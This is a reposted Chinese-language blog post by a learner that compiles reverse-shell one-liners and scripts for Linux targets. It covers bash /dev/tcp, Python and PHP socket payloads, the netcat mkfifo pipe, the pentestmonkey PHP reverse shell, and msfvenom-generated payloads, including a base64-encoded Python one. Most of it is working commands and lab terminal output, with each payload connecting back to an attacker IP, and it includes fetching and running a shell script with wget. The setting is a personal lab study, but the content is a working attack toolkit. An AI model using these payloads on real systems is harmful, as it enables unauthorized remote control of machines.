文章轉載來源:https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F%8D%E5%BC%B9
最開始的時候連shell具體是啥都不太清楚,記得有本書上封面畫着個坐着的小企鵝,寫着Linux shell 才知道shell是Linux獨有的編程語言。
經常聽大佬們講什么什么反彈shell,今天系統學習學起,昨天為此還特地學了學shell語言,感覺和反彈shell沒多大關聯......
目錄
常用的一句話反彈shell總結
1. bash直接反彈
2. python一句話反彈shell
3. python腳本反彈shell
4. php一句話反彈shell
5. php腳本反彈shell
6. 使用nc命令獲取靶機的反彈shell;
7. 使用Kali自帶的腳本文件獲取反彈shell
8. 使用msfvenom 獲取一句話反彈shell
1. bash直接反彈
1.1> 在監聽機上開啟監聽
nc -nvlp 8080
1.2> 在目標主機上寫入bash反彈一句話
bash -i >& /dev/tcp/192.168.37.131/8080 0>&1 //注意,這個38.131就是攻擊機,hacker的ip
代碼講解
bash -i:產生一個bash的交互環境;>&:將聯合符號前面的內容與后面的內容相結合然后一起重定向給后者;
/dev/tcp/192.168.37.131/8080:與目標主機192.168.37.131/8080端口建立一個TCP連接;
0>&1:將標准輸入與標准輸出相結合,重定向到前面標准輸出內容;
1.3> 查看監聽機上是否監聽到shell;
root@root:~# nc -nvlp 8080 listening on [any] 8080 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567 [tom@redhat home]$ whoami //可以看到,已經連接上了TOM的主機 whoami tom [tom@redhat home]$ pwd pwd /home [tom@redhat home]$
2. python一句話反彈shell
2.1> 直接在Kali上監聽1234端口,在靶機上執行如下命令:
在kali上執行監聽 root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ...
在被攻擊端,也就是靶機上執行 [tom@redhat tmp]$ python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
2.2> 在Kali上查看監聽到的1234端口,獲取反彈shell;
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065 sh-4.1$ whoami //可以看到,監聽成功 whoami tom sh-4.1$
3. python腳本反彈shell
這個和上面那個python直接反彈shell沒啥區別,就是讓靶機從攻擊機上面下載文件並執行
3.1> 在Kali的web訪問目錄下准備shell.py;並執行python -m SimpleHTTPServer 80,搭建簡易Web服務(注:web服務在/var/www/html目錄下開啟,當然也可以直接開啟阿帕奇服務 /etc/init.d/apache2 start);
root@root:~# cd /var/www/html/ root@root:/var/www/html# vim shell.py root@root:/var/www/html# cat shell.py #shell.py的內容 import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.37.131",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"]) root@root:/var/www/html# /etc/init.d/apache2 start #開啟Apache服務 [ ok ] Starting apache2 (via systemctl): apache2.service.
3.2> 將python shell腳本下載到目標靶機系統;(一般下載到/tmp目錄下)
[tom@redhat tmp]$ wget http://192.168.37.131/shell.py --2019-05-20 13:54:58-- http://192.168.37.131/shell.py 正在連接 192.168.37.131:80... 已連接。 已發出 HTTP 請求,正在等待回應... 200 OK 長度:218 [text/x-python] 正在保存至: “shell.py.1” 100%[======================================>] 218 --.-K/s in 0s 2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])
3.3> 下載成功后,在Kali上開啟監聽端口1234;並在靶機上運行python腳本 ;
在Kali上開啟監聽端口1234:
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ...
在靶機上執行下載的python腳本文件:
[tom@redhat tmp]$ python shell.py
3.4>查看Kali上監聽的端口1234,獲取靶機的反彈shell;
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35053 [tom@redhat tmp]$ whoami whoami tom [tom@redhat tmp]$ ifconfig ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:EF:E0:1D inet addr:192.168.37.143 Bcast:192.168.37.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2605 errors:0 dropped:0 overruns:0 frame:0 TX packets:286 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:186570 (182.1 KiB) TX bytes:24850 (24.2 KiB)
4. php一句話反彈shell
4.1> 直接在Kali上監聽1234端口,在靶機上執行如下命令:
root@root:/var/www/html# nc -nvlp 1234 //攻擊機 listening on [any] 1234 ...
[tom@redhat tmp]$ php -r '$sock=fsockopen("192.168.37.131",1234); exec("/bin/sh -i <&3 >&3 2>&3");' //靶機
4.2> 在Kali上查看監聽到的1234端口,獲取反彈shell;
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35064 sh-4.1$ whoami whoami tom sh-4.1$
4.3> 將shell轉化為交互的tty;
python -c 'import pty;pty.spawn("/bin/bash")' sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")' python -c 'import pty;pty.spawn("/bin/bash")' //不大明白這是啥意思 [tom@redhat tmp]$ whoami whoami tom [tom@redhat tmp]$
5. php腳本反彈shell
5.1> 在KALI中添加shell.php;並開啟Apache服務;
<?php $sock=fsockopen("192.168.37.131",1234); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
/etc/init.d/apache2 start
root@root:~# cd /var/www/html/ root@root:/var/www/html# vim shell.php root@root:/var/www/html# cat shell.php #php腳本 <?php $sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> root@root:/var/www/html# /etc/init.d/apache2 start #開啟Apache服務 [ ok ] Starting apache2 (via systemctl): apache2.service. root@root:/var/www/html#
5.2> 在靶機上下載該腳本;
[tom@redhat tmp]$ wget http://192.168.37.131/shell.php --2019-05-20 14:21:56-- http://192.168.37.131/shell.php 正在連接 192.168.37.131:80... 已連接。 已發出 HTTP 請求,正在等待回應... 200 OK 長度:80 [text/plain] 正在保存至: “shell.php” 100%[======================================>] 80 --.-K/s in 0s 2019-05-20 14:21:56 (4.53 MB/s) - 已保存 “shell.php” [80/80])
5.3> 下載成功后,在Kali上開啟監聽端口1234;並在靶機上運行python腳本 ;
在Kali上開啟監聽端口1234:
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ...
在靶機上執行下載的php腳本文件:
[tom@redhat tmp]$ php shell.php
5.4>查看Kali上監聽的端口1234,獲取靶機的反彈shell;
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35063 sh-4.1$ whoami whoami tom sh-4.1$ ifconfig ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:EF:E0:1D inet addr:192.168.37.143 Bcast:192.168.37.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2748 errors:0 dropped:0 overruns:0 frame:0 TX packets:369 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:204505 (199.7 KiB) TX bytes:32844 (32.0 KiB)
6. 使用nc命令獲取靶機的反彈shell;
6.1> 在靶機上輸入如下命令;
[tom@redhat tmp]$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f;
//這里有個疑惑,不知道靶機沒裝netcat也能用nc命令? 問了大佬,這是不可以的,靶機一定裝了Netcat才能用nc命令
問題:大佬們,使用nc獲取靶機的反彈shell,靶機是不是也得安裝netcat?
解釋: 不一定 你強調的是用nc接收shell 而靶機發送shell有多種方式 linux可以用bash windows可以用powershell
6.2> 在Kali上監聽1234端口;
root@root:/var/www/html# nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35067 sh-4.1$ whoami whoami tom sh-4.1$
7. 使用Kali自帶的腳本文件獲取反彈shell
7.1> 查看Kali上的php-reverse-shell.php,另存為並修改監聽的IP地址;
root@root:~# cd /usr/share/webshells/ root@root:/usr/share/webshells# ls asp aspx cfm jsp perl php root@root:/usr/share/webshells# cd php root@root:/usr/share/webshells/php# ls findsock.c php-findsock-shell.php qsd-php-backdoor.php php-backdoor.php php-reverse-shell.php simple-backdoor.php root@root:/usr/share/webshells/php# cat php-reverse-shell.php <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility ...... root@root:/usr/share/webshells/php# cp php-reverse-shell.php /var/www/html/ root@root:/usr/share/webshells/php# cd /var/www/html/ root@root:/var/www/html# ls 1.html a.js index.html shell.elf 1.php decode.py index.nginx-debian.html shell.php 2.html dirty.c php-reverse-shell.php shell.py 37292.c dirtycow-master shell.c shell.txt root@root:/var/www/html# vim php-reverse-shell.php root@root:/var/www/html# cat php-reverse-shell.php #修改監聽的IP地址 ...... // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.37.131'; // CHANGE THIS #修改IP地址 $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; ...... root@root:/var/www/html# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service.
7.2> 將文件上傳到靶機上;並監聽1234端口,執行文件,獲取反彈shell;
8. 使用msfvenom 獲取一句話反彈shell
當我們不記得前面說的所有反彈shell的反彈語句時,只要我們有Metasploit,就可以生成我們所需要的各類命令行一句話,具體使用方法如下:
8.1 查詢 payload 具體路徑
我們直接可以使用 msfvenom -l 結合關鍵字過濾(如cmd/unix/reverse),找出我們需要的各類反彈一句話payload的路徑信息。找windows的也同理!!!
root@root:~# msfvenom -l payloads |grep "cmd/unix/reverse" cmd/unix/reverse Creates an interactive shell through two inbound connections cmd/unix/reverse_awk Creates an interactive shell via GNU AWK cmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature. cmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL. cmd/unix/reverse_lua Creates an interactive shell via Lua cmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode cmd/unix/reverse_netcat Creates an interactive shell via netcat cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat cmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections cmd/unix/reverse_perl Creates an interactive shell via perl cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL cmd/unix/reverse_python Connect back and create a command shell via Python cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design. cmd/unix/reverse_r Connect back and create a command shell via R cmd/unix/reverse_ruby Connect back and create a command shell via Ruby cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL cmd/unix/reverse_socat_udp Creates an interactive shell via socat cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option cmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload) cmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
8.2> 生成我們所需要的一句話反彈shell;
msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R #bash反彈一句話 msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R #nc反彈一句話 msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R #python反彈一句話 ...... root@root:~# msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R No platform was selected, choosing Msf::Module::Platform::Unix from the payload No Arch selected, selecting Arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 68 bytes 0<&178-;exec 178<>/dev/tcp/192.168.37.131/1234;sh <&178 >&178 2>&178 root@root:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R No platform was selected, choosing Msf::Module::Platform::Unix from the payload No Arch selected, selecting Arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 93 bytes mkfifo /tmp/fqzh; nc 192.168.37.131 1234 0</tmp/fqzh | /bin/sh >/tmp/fqzh 2>&1; rm /tmp/fqzh root@root:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R No platform was selected, choosing Msf::Module::Platform::Unix from the payload No Arch selected, selecting Arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 573 bytes python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICAgICA7IGhvc3Q9IjE5Mi4xNjguMzcuMTMxIiAgICAgICAgIDsgcG9ydD0xMjM0ICAgICAgICAgOyBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7IHMuY29ubmVjdCgoaG9zdCAgICAgICAsICAgICAgcG9ydCkpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDApICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDIpICAgICAgICAgOyBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
8.3> 在Kali上監聽端口,在靶機上執行生成的一句話shell;即可獲取目標的反彈shell;